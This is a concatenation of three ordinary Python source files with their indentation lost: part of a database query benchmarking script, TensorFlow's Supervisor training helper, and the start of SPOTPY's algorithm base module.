query_prefix = f'{test_name}.query{query_index}'
# We have some crazy long queries (about 100kB), so trim them to a sane
# length. This means we can't use query text as an identifier and have to
# use the test name + the test-wide query index.
query_display_name = q
if len(query_display_name) > 1000:
query_display_name = f'{query_display_name[:1000]}...({query_index})'
print(f'display-name\t{query_index}\t{tsv_escape(query_display_name)}')
# Prewarm: run once on both servers. Helps to bring the data into memory,
# precompile the queries, etc.
# A query might not run on the old server if it uses a function added in the
# new one. We want to run them on the new server only, so that the PR author
# can ensure that the test works properly. Remember the errors we had on
# each server.
query_error_on_connection = [None] * len(all_connections)
for conn_index, c in enumerate(all_connections):
try:
prewarm_id = f'{query_prefix}.prewarm0'
# Will also detect too long queries during warmup stage
res = c.execute(q, query_id = prewarm_id, settings = {'max_execution_time': 10})
print(f'prewarm\t{query_index}\t{prewarm_id}\t{conn_index}\t{c.last_query.elapsed}')
except KeyboardInterrupt:
raise
except:
# FIXME the driver reconnects on error and we lose settings, so this
# might lead to further errors or unexpected behavior.
query_error_on_connection[conn_index] = traceback.format_exc()
continue
# Report all errors that occurred during prewarm and decide what to do next.
# If prewarm fails for the query on all servers -- skip the query and
# continue testing the next query.
# If prewarm fails on one of the servers, run the query on the rest of them.
no_errors = []
for i, e in enumerate(query_error_on_connection):
if e:
print(e, file = sys.stderr)
else:
no_errors.append(i)
if len(no_errors) == 0:
continue
elif len(no_errors) < len(all_connections):
print(f'partial\t{query_index}\t{no_errors}')
this_query_connections = [all_connections[index] for index in no_errors]
# Now, perform measured runs.
# Track the time spent by the client to process this query, so that we can
# notice the queries that take long to process on the client side, e.g. by
# sending excessive data.
start_seconds = time.perf_counter()
server_seconds = 0
profile_seconds = 0
run = 0
# Arrays of run times for each connection.
all_server_times = []
for conn_index, c in enumerate(this_query_connections):
all_server_times.append([])
while True:
run_id = f'{query_prefix}.run{run}'
for conn_index, c in enumerate(this_query_connections):
try:
res = c.execute(q, query_id = run_id)
except Exception as e:
# Add query id to the exception to make debugging easier.
e.args = (run_id, *e.args)
e.message = run_id + ': ' + e.message
raise
elapsed = c.last_query.elapsed
all_server_times[conn_index].append(elapsed)
server_seconds += elapsed
print(f'query\t{query_index}\t{run_id}\t{conn_index}\t{elapsed}')
if elapsed > 10:
# Stop processing pathologically slow queries, to avoid timing out
# the entire test task. This shouldn't really happen, so we don't
# need much handling for this case and can just exit.
print(f'The query no. {query_index} is taking too long to run ({elapsed} s)', file=sys.stderr)
exit(2)
# Be careful with the counter, after this line it's the next iteration
# already.
run += 1
# Try to run any query for at least the specified number of times,
# before considering other stop conditions.
if run < args.runs:
continue
# For very short queries we have a special mode where we run them for at
# least some time. The recommended lower bound of run time for "normal"
# queries is about 0.1 s, and we run them about 10 times, giving the
# time per query per server of about one second. Use this value as a
# reference for "short" queries.
if is_short[query_index]:
if server_seconds >= 2 * len(this_query_connections):
break
# Also limit the number of runs, so that we don't go crazy processing
# the results -- 'eqmed.sql' is really suboptimal.
if run >= 500:
break
else:
if run >= args.runs:
break
client_seconds = time.perf_counter() - start_seconds
print(f'client-time\t{query_index}\t{client_seconds}\t{server_seconds}')
# Run additional profiling queries to collect profile data, but only if test times appeared to be different.
# We have to do it after normal runs because otherwise it will affect test statistics too much
if len(all_server_times) != 2:
continue
if len(all_server_times[0]) < 3:
# Don't fail if for some reason there are not enough measurements.
continue
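# Welch's t-test (unequal variances, equal_var=False) on the per-server run-time samples;
# a small p-value suggests the difference between the two servers is unlikely to be noise.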
pvalue = stats.ttest_ind(all_server_times[0], all_server_times[1], equal_var = False).pvalue
median = [statistics.median(t) for t in all_server_times]
# Keep this consistent with the value used in report. Should eventually move
# to (median[1] - median[0]) / min(median), which is compatible with "times"
# difference we use in report (max(median) / min(median)).
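# Worked example (hypothetical): medians of 1.00 s (old) and 1.07 s (new) give
# relative_diff = (1.07 - 1.00) / 1.00 = 0.07, which exceeds the default 0.05 threshold.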
relative_diff = (median[1] - median[0]) / median[0]
print(f'diff\t{query_index}\t{median[0]}\t{median[1]}\t{relative_diff}\t{pvalue}')
if abs(relative_diff) < ignored_relative_change or pvalue > 0.05:
continue
# Perform profile runs for fixed amount of time. Don't limit the number
# of runs, because we also have short queries.
profile_start_seconds = time.perf_counter()
run = 0
while time.perf_counter() - profile_start_seconds < args.profile_seconds:
run_id = f'{query_prefix}.profile{run}'
for conn_index, c in enumerate(this_query_connections):
try:
res = c.execute(q, query_id = run_id, settings = {'query_profiler_real_time_period_ns': 10000000})
print(f'profile\t{query_index}\t{run_id}\t{conn_index}\t{c.last_query.elapsed}')
except Exception as e:
# Add query id to the exception to make debugging easier.
e.args = (run_id, *e.args)
e.message = run_id + ': ' + e.message
raise
run += 1
profile_total_seconds += time.perf_counter() - profile_start_seconds
print(f'profile-total\t{profile_total_seconds}')
reportStageEnd('run')
# Run drop queries
if not args.keep_created_tables and not args.use_existing_tables:
drop_queries = substitute_parameters(drop_query_templates)
for conn_index, c in enumerate(all_connections):
for q in drop_queries:
c.execute(q)
print(f'drop\t{conn_index}\t{c.last_query.elapsed}\t{tsv_escape(q)}')
reportStageEnd('drop-2')
|
supervisor.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training helper that checkpoints models and computes summaries.
The Supervisor is a small wrapper around a `Coordinator`, a `Saver`,
and a `SessionManager` that takes care of common needs of Tensorflow
training programs.
Use for a single program:
```python
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that will checkpoint the model in '/tmp/mydir'.
sv = Supervisor(logdir='/tmp/mydir')
# Get a Tensorflow session.
sess = sv.prepare_or_create_session(FLAGS.master)
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
# Ask for all the services to stop.
sv.stop()
```
After the call to `prepare_or_create_session()`, all `Variables` in the `Graph`
have been initialized. In addition, a few services have been started
to checkpoint the model and fetch summaries.
If the program crashes and you restart it, the call to
`prepare_or_create_session()` automatically reinitializes the Variables
from most recent checkpoint.
If any of the services raises an exception, it will ask the Supervisor to stop.
In that case `should_stop()` will return True and you should stop your
training loop.
Finish by calling `stop()` to cleanly wait for the services to complete.
If a service thread raised an exception, it is re-raised in the `stop()`
call so your program can easily report it.
Use for multiple replicas:
To train with replicas you deploy the same program in a `Cluster`.
One of the tasks must be identified as the *chief*: the task that handles
initialization, checkpoints, summaries, and recovery. The other tasks
depend on the *chief* for these services.
The only change you have to do to the single program code is to indicate
if the program is running as the *chief*.
```python
# Choose a task as the chief. This could be based on server_def.task_index, or
# job_def.name, or job_def.tasks. It's entirely up to the end user. But there
# can be only one *chief*.
is_chief = (server_def.task_index == 0)
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that uses log directory on a shared file system.
# Indicate if you are the 'chief'
sv = Supervisor(logdir='/shared_directory/...', is_chief=is_chief)
# Get a Session in a TensorFlow server on the cluster.
sess = sv.prepare_or_create_session(FLAGS.master)
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
# Ask for all the services to stop.
sv.stop()
```
In the *chief* task, the `Supervisor` works exactly as in the first example
above. In the other tasks `prepare_or_create_session()` waits for the Model to
have been initialized before returning a session to the training code.
If one of the tasks crashes and restarts, `prepare_or_create_session()` checks
if the Model is initialized. If yes, it just creates a session and
returns it to the training code that proceeds normally. If the model
needs to be initialized, the chief task takes care of reinitializing it;
the other tasks just wait for the model to have been initialized.
NOTE: This modified program still works fine as a single program.
The single program marks itself as the chief.
What *master* string to use:
Whether you are running on your machine or in the cluster you can use the
following values for the --master flag:
Specifying 'local' requests a Session that uses the proto-based "Master
interface" to run TensorFlow programs. It does not use an RPC subsystem to
communicate within the process, and cannot communicate with remote TensorFlow
workers.
Specifying 'localhost:port' requests a Session that uses the loopback RPC
interface, and also allows the in-process master to access remote tensorflow
workers.
Advanced use.
Launching additional services.
`prepare_or_create_session()` launches the Checkpoint and Summary
services (threads). If you need more services to run you can simply
launch them after `prepare_or_create_session()` returns. The Supervisor
uses a Coordinator to help multiple threads stop together, so pass that
coordinator ('sv.coord') to the threads you launch.
Example: Start a QueueRunner to prefetch inputs.
```python
...build the model with a QueueRunner to prefetch inputs...
qr = QueueRunner(input_queue, [enqueue_op])
...
sv = Supervisor(logdir='/tmp/mydir')
sess = sv.prepare_or_create_session(FLAGS.master)
# Start the queue runner threads.
threads = qr.create_threads(sess, sv.coord, start=True)
# Catch OutOfRangeError, which signals that your input queue is exhausted.
try:
while not sv.should_stop():
sess.run(my_train_op)
except tf.errors.OutOfRangeError:
pass
# Wait for the QueueRunner and service threads to complete.
sv.stop(threads)
```
Note: Starting `QueueRunner` threads is very common, so the Supervisor
provides a convenience method named `start_queue_runners()`. If you use
that method you do not have to keep track of the started threads and
can just call `stop()` normally:
```python
...build the model with a QueueRunner to prefetch inputs...
qr = QueueRunner(input_queue, [enqueue_op])
...
sv = Supervisor(logdir='/tmp/mydir')
sess = sv.prepare_or_create_session(FLAGS.master)
# Start the queue runner threads.
sv.start_queue_runners(sess, [qr])
# Catch OutOfRangeError, which signals that your input queue is exhausted.
try:
while not sv.should_stop():
sess.run(my_train_op)
except tf.errors.OutOfRangeError:
pass
# Wait for the QueueRunner and service threads to complete.
sv.stop()
```
Launching fewer services.
`prepare_or_create_session()` launches the `Summary` and `Checkpoint`
services (threads) which use either the optional `summary_op`
and `saver` passed to the constructor, or default ones created
automatically by the `Supervisor`. If you want to run your own summary
and checkpointing logic, disable these services by passing `None` to the
`summary_op` and `saver` parameters.
Example: Create summaries manually every 100 steps in the chief.
```python
# Create a Supervisor with no automatic summaries.
sv = Supervisor(logdir='/tmp/mydir', is_chief=is_chief, summary_op=None)
# As summary_op was None, prepare_or_create_session() does not start the
# summary thread.
sess = sv.prepare_or_create_session(FLAGS.master)
for step in xrange(1000000):
if is_chief and step % 100 == 0:
# Create the summary every 100 chief steps.
sv.summary_computed(sess, sess.run(my_summary_op))
else:
# Train normally
sess.run(my_train_op)
```
Custom Model Initialization.
`prepare_or_create_session()` only supports initializing the model by running an
`init_op`. If you have special initialization needs, use `local_init_op`.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import time
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import logging
from tensorflow.python.training import coordinator
from tensorflow.python.training import saver as saver_mod
from tensorflow.python.training import summary_io
from tensorflow.python.training import training_util
from tensorflow.python.training.session_manager import SessionManager
class Supervisor(object):
"""Training helper that checkpoints and computes summaries."""
# Value to pass for the 'ready_op', 'init_op', 'summary_op', 'saver',
# and 'global_step' parameters of Supervisor.__init__() to indicate that
# the default behavior should be used.
USE_DEFAULT = 0
# Protects _TENSORFLOW_LAUNCHED
_launch_lock = threading.Lock()
# True if we have already launched the tensorflow in-process server.
_TENSORFLOW_LAUNCHED = False
def __init__(self, graph=None, ready_op=USE_DEFAULT, is_chief=True,
init_op=USE_DEFAULT, init_feed_dict=None,
local_init_op=USE_DEFAULT, logdir=None,
summary_op=USE_DEFAULT, saver=USE_DEFAULT,
global_step=USE_DEFAULT, save_summaries_secs=120,
save_model_secs=600, recovery_wait_secs=30,
checkpoint_basename="model.ckpt", session_manager=None):
"""Create a `Supervisor`.
Args:
graph: A `Graph`. The graph that the model will use. Defaults to the
default `Graph`. The supervisor may add operations to the graph before
creating a session, but the graph should not be modified by the caller
after passing it to the supervisor.
ready_op: `Operation` to check if the model is initialized. This
operation is run by supervisors in `prepare_or_create_session()` to
check if the model is ready to use. The model is considered ready if
that operation succeeds. Defaults to the operation returned from
`tf.assert_variables_initialized()`. If `None`, the model is not checked
for readiness.
is_chief: If True, create a chief supervisor in charge of initializing
and restoring the model. If False, create a supervisor that relies
on a chief supervisor for inits and restore.
init_op: `Operation`. Used by chief supervisors to initialize the model
when it can not be recovered. Defaults to an `Operation` that
initializes all variables. If `None`, no initialization is done
automatically.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
local_init_op: `Operation`. Used by all supervisors to run initializations
that should run for every new supervisor instance. By default these
are table initializers and initializers for local variables.
If `None`, no further per supervisor-instance initialization is
done automatically.
logdir: A string. Optional path to a directory where to checkpoint the
model and log events for the visualizer. Used by chief supervisors.
The directory will be created if it does not exist.
summary_op: An `Operation` that returns a Summary for the event logs.
Used by chief supervisors if a `logdir` was specified. Defaults to the
operation returned from merge_all_summaries(). If `None`, summaries are
not computed automatically.
saver: A Saver object. Used by chief supervisors if a `logdir` was
specified. Defaults to the saver returned by Saver().
If `None`, the model is not saved automatically.
global_step: An integer Tensor of size 1 that counts steps. The value
from 'global_step' is used in summaries and checkpoint filenames.
Defaults to the op named 'global_step' in the graph if it exists, is of
rank 1, size 1, and of type tf.int32 or tf.int64. If `None` the global
step is not recorded in summaries and checkpoint files. Used by chief
supervisors if a `logdir` was specified.
save_summaries_secs: Number of seconds between the computation of
summaries for the event log. Defaults to 120 seconds. Pass 0 to
disable summaries.
save_model_secs: Number of seconds between the creation of model
checkpoints. Defaults to 600 seconds. Pass 0 to disable checkpoints.
recovery_wait_secs: Number of seconds between checks that the model
is ready. Used by supervisors when waiting for a chief supervisor
to initialize or restore the model. Defaults to 30 seconds.
checkpoint_basename: The basename for checkpoint saving.
session_manager: `SessionManager`, which manages Session creation and
recovery. If it is `None`, a default `SessionManager` will be created
with the set of arguments passed in for backwards compatibility.
Returns:
A `Supervisor`.
"""
# Set default values of arguments.
if graph is None:
graph = ops.get_default_graph()
with graph.as_default():
self._init_ready_op(ready_op=ready_op)
self._init_init_op(init_op=init_op, init_feed_dict=init_feed_dict)
self._init_local_init_op(local_init_op=local_init_op)
self._init_saver(saver=saver)
self._init_summary_op(summary_op=summary_op)
self._init_global_step(global_step=global_step)
self._graph = graph
self._is_chief = is_chief
self._logdir = logdir
self._save_summaries_secs = save_summaries_secs
self._save_model_secs = save_model_secs
self._recovery_wait_secs = recovery_wait_secs
self._coord = coordinator.Coordinator()
if logdir:
self._save_path = os.path.join(self._logdir, checkpoint_basename)
self._summary_writer = summary_io.SummaryWriter(self._logdir)
else:
self._save_path = None
self._summary_writer = None
self._init_session_manager(session_manager=session_manager)
self._started_threads = []
self._verify_setup()
# The graph is not allowed to change anymore.
graph.finalize()
def _init_session_manager(self, session_manager=None):
if session_manager is None:
self._session_manager = SessionManager(
local_init_op=self._local_init_op,
ready_op=self._ready_op, graph=self._graph,
recovery_wait_secs=self._recovery_wait_secs)
else:
self._session_manager = session_manager
def _get_first_op_from_collection(self, key):
"""Returns the first `Operation` from a collection.
Args:
key: A string collection key.
Returns:
The first Op found in a collection, or `None` if the collection is empty.
"""
try:
op_list = ops.get_collection(key)
if len(op_list) > 1:
logging.info("Found %d %s operations. Returning the first one.",
len(op_list), key)
if op_list:
return op_list[0]
except LookupError:
pass
return None
def _init_ready_op(self, ready_op=USE_DEFAULT):
"""Initializes ready_op.
Args:
ready_op: `Operation` to check if the model is initialized.
If it's set to USE_DEFAULT, creates an op that checks all
the variables are initialized.
"""
if ready_op is Supervisor.USE_DEFAULT:
ready_op = self._get_first_op_from_collection(ops.GraphKeys.READY_OP)
if ready_op is None:
ready_op = variables.assert_variables_initialized()
if ready_op is not None:
ops.add_to_collection(ops.GraphKeys.READY_OP, ready_op)
self._ready_op = ready_op
def _init_init_op(self, init_op=USE_DEFAULT, init_feed_dict=None):
"""Initializes init_op.
Args:
init_op: `Operation` to initialize the variables. If set to USE_DEFAULT,
create an op that initializes all variables and tables.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
"""
if init_op is Supervisor.USE_DEFAULT:
init_op = self._get_first_op_from_collection(ops.GraphKeys.INIT_OP)
if init_op is None:
init_op = variables.initialize_all_variables()
ops.add_to_collection(ops.GraphKeys.INIT_OP, init_op)
self._init_op = init_op
self._init_feed_dict = init_feed_dict
def _init_local_init_op(self, local_init_op=USE_DEFAULT):
"""Initializes local_init_op.
Args:
local_init_op: `Operation` run for every new supervisor instance. If set
to USE_DEFAULT create an op based on the `LOCAL_INITIALIZERS` graph
collection.
"""
if local_init_op is Supervisor.USE_DEFAULT:
local_init_op = self._get_first_op_from_collection(
ops.GraphKeys.LOCAL_INIT_OP)
if local_init_op is None:
op_list = [variables.initialize_local_variables(),
data_flow_ops.initialize_all_tables()]
if op_list:
local_init_op = control_flow_ops.group(*op_list)
ops.add_to_collection(ops.GraphKeys.LOCAL_INIT_OP, local_init_op)
self._local_init_op = local_init_op
def _init_saver(self, saver=USE_DEFAULT):
"""Initializes saver.
Args:
saver: A `Saver` object. If set to USE_DEFAULT, create one that
saves all the variables.
"""
if saver is Supervisor.USE_DEFAULT:
saver = self._get_first_op_from_collection(ops.GraphKeys.SAVERS)
if saver is None and variables.all_variables():
saver = saver_mod.Saver()
ops.add_to_collection(ops.GraphKeys.SAVERS, saver)
self._saver = saver
def _init_summary_op(self, summary_op=USE_DEFAULT):
"""Initilizes summary_op.
Args:
summary_op: An Operation that returns a Summary for the event logs.
If set to USE_DEFAULT, create an op that merges all the summaries.
"""
if summary_op is Supervisor.USE_DEFAULT:
summary_op = self._get_first_op_from_collection(ops.GraphKeys.SUMMARY_OP)
if summary_op is None:
summary_op = logging_ops.merge_all_summaries()
if summary_op is not None:
ops.add_to_collection(ops.GraphKeys.SUMMARY_OP, summary_op)
self._summary_op = summary_op
def _init_global_step(self, global_step=USE_DEFAULT):
"""Initializes global_step.
Args:
global_step: An integer Tensor of size 1 that counts steps. If
set to USE_DEFAULT, creates global_step tensor.
"""
if global_step is Supervisor.USE_DEFAULT:
global_step = self._get_first_op_from_collection(
ops.GraphKeys.GLOBAL_STEP)
if global_step is None:
global_step = self._default_global_step_tensor()
if global_step is not None:
ops.add_to_collection(ops.GraphKeys.GLOBAL_STEP, global_step)
self._global_step = global_step
@property
def session_manager(self):
"""Return the SessionManager used by the Supervisor.
Returns:
A SessionManager object.
"""
return self._session_manager
@property
def coord(self):
"""Return the Coordinator used by the Supervisor.
The Coordinator can be useful if you want to run multiple threads
during your training.
Returns:
A Coordinator object.
"""
return self._coord
@property
def init_op(self):
"""Return the Init Op used by the supervisor.
Returns:
An Op or `None`.
"""
return self._init_op
@property
def init_feed_dict(self):
"""Return the feed dictionary used when evaluating the `init_op`.
Returns:
A feed dictionary or `None`.
"""
return self._init_feed_dict
@property
def ready_op(self):
"""Return the Ready Op used by the supervisor.
Returns:
An Op or `None`.
"""
return self._ready_op
@property
def summary_writer(self):
"""Return the SummaryWriter used by the supervisor.
Returns:
A SummaryWriter.
"""
return self._summary_writer
@property
def summary_op(self):
"""Return the Summary Tensor used by the supervisor.
Returns:
A string Tensor for the summary or `None`.
"""
return self._summary_op
@property
def save_summaries_secs(self):
"""Return the delay between summary computations.
Returns:
A number of seconds.
"""
return self._save_summaries_secs
@property
def global_step(self):
"""Return the global_step Tensor used by the supervisor.
Returns:
An integer Tensor for the global_step.
"""
return self._global_step
@property
def saver(self):
"""Return the Saver used by the supervisor.
Returns:
A Saver object.
"""
return self._saver
@property
def save_model_secs(self):
"""Return the delay between checkpoints.
Returns:
A number of seconds.
"""
return self._save_model_secs
@property
def save_path(self):
"""Return the save path used by the supervisor.
Returns:
A string.
"""
return self._save_path
def _write_graph(self):
"""Writes graph_def to `logdir` and adds it to summary if applicable."""
if not self._is_chief:
return
if self._logdir:
training_util.write_graph(self._graph.as_graph_def(),
self._logdir, "graph.pbtxt")
if self._summary_writer:
self._summary_writer.add_graph(self._graph)
def start_standard_services(self, sess):
"""Start the standard services for 'sess'.
This starts services in the background. The services started depend
on the parameters to the constructor and may include:
- A Summary thread computing summaries every save_summaries_secs.
- A Checkpoint thread saving the model every save_model_secs.
- A StepCounter thread to measure step time.
Args:
sess: A Session.
Returns:
A list of threads that are running the standard services. You can use
the Supervisor's Coordinator to join these threads with:
sv.coord.Join(<list of threads>)
Raises:
ValueError: If no `logdir` was passed to the constructor as the
services need a log directory.
"""
if not self._is_chief:
return
if not self._logdir:
logging.warning("Standard services need a 'logdir' "
"passed to the SessionManager")
return
if self._global_step is not None:
# Only add the session log if we keep track of global step.
# TensorBoard cannot use START message for purging expired events
# if there is no step value.
current_step = training_util.global_step(sess, self._global_step)
self._summary_writer.add_session_log(
SessionLog(status=SessionLog.START),
current_step)
threads = []
if self._summary_op is not None and self._save_summaries_secs:
threads.append(SVSummaryThread(self, sess))
if self._global_step is not None and self._save_summaries_secs:
threads.append(SVStepCounterThread(self, sess))
if self.saver and self._save_model_secs:
threads.append(SVTimerCheckpointThread(self, sess))
for t in threads:
t.start()
self._started_threads.extend(threads)
return threads
def prepare_or_wait_for_session(self, master="", config=None,
wait_for_checkpoint=False,
start_standard_services=True):
"""Make sure the model is ready to be used.
Create a session on 'master', recovering or initializing the model as
needed, or wait for a session to be ready. If running as the chief
and `start_standard_services` is set to True, also call the session
manager to start the standard services.
Args:
master: name of the TensorFlow `master` to use. If not specified or
empty a 'Direct Session' is created.
config: Optional ConfigProto proto used to configure the session,
which is passed as-is to create the session.
wait_for_checkpoint: Whether we should wait for the availability of a
checkpoint before creating Session. Defaults to False.
start_standard_services: Whether to start the standard services,
such as checkpoint, summary and step counter.
Returns:
A Session object that can be used to drive the model.
"""
if self._is_chief:
sess = self._session_manager.prepare_session(
master, self.init_op, self.saver, self._logdir,
wait_for_checkpoint=wait_for_checkpoint, config=config,
init_feed_dict=self._init_feed_dict)
self._write_graph()
# For users who recreate the session with prepare_or_wait_for_session(), we
# need to clear the coordinator's stop_event so that threads managed by
# the coordinator can run.
self._coord.clear_stop()
if start_standard_services:
self.start_standard_services(sess)
else:
sess = self._session_manager.wait_for_session(master, config=config)
return sess
def start_queue_runners(self, sess, queue_runners=None):
"""Start threads for `QueueRunners`.
Args:
sess: A `Session`.
queue_runners: A list of `QueueRunners`. If not specified, we'll use the
list of queue runners gathered in the graph under the key
`GraphKeys.QUEUE_RUNNERS`.
Returns:
The list of threads started for the `QueueRunners`.
"""
if queue_runners is None:
queue_runners = self._graph.get_collection(ops.GraphKeys.QUEUE_RUNNERS)
threads = []
for qr in queue_runners:
threads.extend(qr.create_threads(sess, coord=self._coord, daemon=True,
start=True))
self._started_threads.extend(threads)
return threads
def loop(self, timer_interval_secs, target, args=None):
"""Start a LooperThread that calls a function periodically.
If `timer_interval_secs` is None the thread calls `target(args)`
repeatedly. Otherwise `target(args)` is called every `timer_interval_secs`
seconds. The thread terminates when a stop is requested.
The started thread is added to the list of threads managed by the supervisor
so it does not need to be passed to the `stop()` method.
Args:
timer_interval_secs: Number. Time boundaries at which to call `target`.
target: A callable object.
args: Optional arguments to pass to `target` when calling it.
Returns:
The started thread.
"""
looper = coordinator.LooperThread(self._coord, timer_interval_secs,
target=target, args=args)
looper.start()
self._started_threads.append(looper)
return looper
def stop(self, threads=None, close_summary_writer=True):
"""Stop the services and the coordinator.
This does not Close the session.
Args:
threads: Optional list of threads to join with the coordinator. If
`None`, defaults to the threads running the standard services plus the
threads started for `QueueRunners` if `start_queue_runners()` was
called. To wait on an additional set of threads, pass the list in this
parameter and they will be merged with the internal list of running
services.
close_summary_writer: Whether to close the `summary_writer`. Defaults to
`True`.
"""
join_threads = []
join_threads.extend(self._started_threads)
if threads is not None:
join_threads.extend(threads)
self._coord.request_stop()
self._coord.join(join_threads)
# Close the writer last, in case one of the running threads was using it.
if close_summary_writer and self._summary_writer:
# Stop messages are not logged with event.step,
# since the session may have already terminated.
self._summary_writer.add_session_log(SessionLog(status=SessionLog.STOP))
self._summary_writer.close()
self._started_threads = []
def request_stop(self, ex=None):
"""Request that the coordinator stop the threads.
See `Coordinator.request_stop()`.
Args:
ex: Optional `Exception`, or Python `exc_info` tuple as returned by
`sys.exc_info()`. If this is the first call to `request_stop()` the
corresponding exception is recorded and re-raised from `join()`.
"""
self._coord.request_stop(ex=ex)
def should_stop(self):
"""Check if the coordinator was told to stop.
See `Coordinator.should_stop()`.
Returns:
True if the coordinator was told to stop, False otherwise.
"""
return self._coord.should_stop()
def stop_on_exception(self):
"""Context handler to stop the supervisor when an exception is raised.
See `Coordinator.stop_on_exception()`.
Returns:
A context handler.
"""
return self._coord.stop_on_exception()
def wait_for_stop(self):
"""Block waiting for the coordinator to stop."""
self._coord.wait_for_stop()
def summary_computed(self, sess, summary, global_step=None):
"""Indicate that a summary was computed.
Args:
sess: A `Session` object.
summary: A Summary proto, or a string holding a serialized summary proto.
global_step: Int. global step this summary is associated with. If `None`,
it will try to fetch the current step.
Raises:
TypeError: if 'summary' is not a Summary proto or a string.
RuntimeError: if the Supervisor was created without a `logdir`.
"""
if not self._logdir:
raise RuntimeError("summary_computed() requires a logdir")
if global_step is None and self.global_step is not None:
global_step = training_util.global_step(sess, self.global_step)
if self._summary_writer:
self._summary_writer.add_summary(summary, global_step)
def _default_global_step_tensor(self):
try:
gs = ops.get_default_graph().get_tensor_by_name("global_step:0")
if gs.dtype.base_dtype in [dtypes.int32, dtypes.int64]:
return gs
else:
logging.warning("Found 'global_step' is not an int type: %s", gs.dtype)
return None
except KeyError:
return None
def _verify_setup(self):
"""Check that all is good.
Raises:
ValueError: If something is not good.
"""
# Not running as chief means that replicas are used.
# In that case all Variables must have their device set.
if not self._is_chief:
for op in self._graph.get_operations():
if op.type == "Variable" and not op.device:
raise ValueError("When using replicas, all Variables must have "
"their device set: %s" % op)
class SVSummaryThread(coordinator.LooperThread):
"""A thread to save summaries on a timer."""
def __init__(self, sv, sess):
"""Create a SVSummaryThread.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVSummaryThread, self).__init__(sv.coord, sv.save_summaries_secs)
self._sv = sv
self._sess = sess
def run_loop(self):
if self._sv.global_step is not None:
summary_strs, global_step = self._sess.run([self._sv.summary_op,
self._sv.global_step])
else:
summary_strs = self._sess.run(self._sv.summary_op)
global_step = None
if self._sv.summary_writer:
self._sv.summary_writer.add_summary(summary_strs, global_step)
class SVStepCounterThread(coordinator.LooperThread):
"""Threads to count steps and measure their duration."""
def __init__(self, sv, sess):
"""Create a `SVStepCounterThread`.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVStepCounterThread, self).__init__(sv.coord, sv.save_summaries_secs)
self._sv = sv
self._sess = sess
self._last_time = 0.0
self._last_step = 0
self._summary_tag = "%s/sec" % self._sv.global_step.op.name
def start_loop(self):
self._last_time = time.time()
self._last_step = training_util.global_step(
self._sess, self._sv.global_step)
def run_loop(self):
# Count the steps.
current_step = training_util.global_step(self._sess, self._sv.global_step)
added_steps = current_step - self._last_step
self._last_step = current_step
# Measure the elapsed time.
current_time = time.time()
elapsed_time = current_time - self._last_time
self._last_time = current_time
# Reports the number of steps done per second
steps_per_sec = added_steps / elapsed_time
summary = Summary(value=[Summary.Value(tag=self._summary_tag,
simple_value=steps_per_sec)])
if self._sv.summary_writer:
self._sv.summary_writer.add_summary(summary, current_step)
logging.log_first_n(logging.INFO, "%s: %g", 10,
self._summary_tag, steps_per_sec)
class SVTimerCheckpointThread(coordinator.LooperThread):
"""A thread to checkpoint on a timer."""
def __init__(self, sv, sess):
"""Create a `SVTimerCheckpointThread`.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVTimerCheckpointThread, self).__init__(sv.coord, sv.save_model_secs)
self._sv = sv
self._sess = sess
def run_loop(self):
self._sv.saver.save(self._sess, self._sv.save_path,
global_step=self._sv.global_step)
if self._sv.summary_writer and self._sv.global_step is not None:
current_step = training_util.global_step(self._sess, self._sv.global_step)
self._sv.summary_writer.add_session_log(
SessionLog(status=SessionLog.CHECKPOINT,
checkpoint_path=self._sv.save_path),
current_step)
# TODO(sherrym): All non-PEP8 compliant names will be deprecated shortly.
setattr(Supervisor, "PrepareSession", Supervisor.prepare_or_wait_for_session)
setattr(Supervisor, "StartQueueRunners", Supervisor.start_queue_runners)
setattr(Supervisor, "StartStandardServices", Supervisor.start_standard_services)
setattr(Supervisor, "Stop", Supervisor.stop)
setattr(Supervisor, "RequestStop", Supervisor.request_stop)
setattr(Supervisor, "Loop", Supervisor.loop)
setattr(Supervisor, "ShouldStop", Supervisor.should_stop)
setattr(Supervisor, "StopOnException", Supervisor.stop_on_exception)
setattr(Supervisor, "WaitForStop", Supervisor.wait_for_stop)
setattr(Supervisor, "SummaryComputed", Supervisor.summary_computed)
|
_algorithm.py
|
'''
Copyright (c) 2018 by Tobias Houska
This file is part of Statistical Parameter Optimization Tool for Python(SPOTPY).
:author: Tobias Houska
This file holds the standards for every algorithm.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from spotpy import database
from spotpy import parameter
import numpy as np
import time
import threading
try:
from queue import Queue
except ImportError:
# On Python 2 the Queue class lives in the 'Queue' module and is a multiprocessing class.
# There, the main process has to sleep for a moment so that a finished subprocess can be
# garbage-collected before its result is accessed; this slows the simulation down slightly.
# Python 3 does not need this workaround.
from Queue import Queue
class _RunStatistic(object):
"""
This class checks for each run whether the objective function improved and keeps
the best parameter set found so far.
Every _algorithm has an object of this class as its status attribute.
Usage:
status = _RunStatistic(repetitions, algorithm_name, optimization_direction, parnames)
status(objectivefunction, params)
"""
def __init__(self, repetitions, algorithm_name, optimization_direction, parnames):
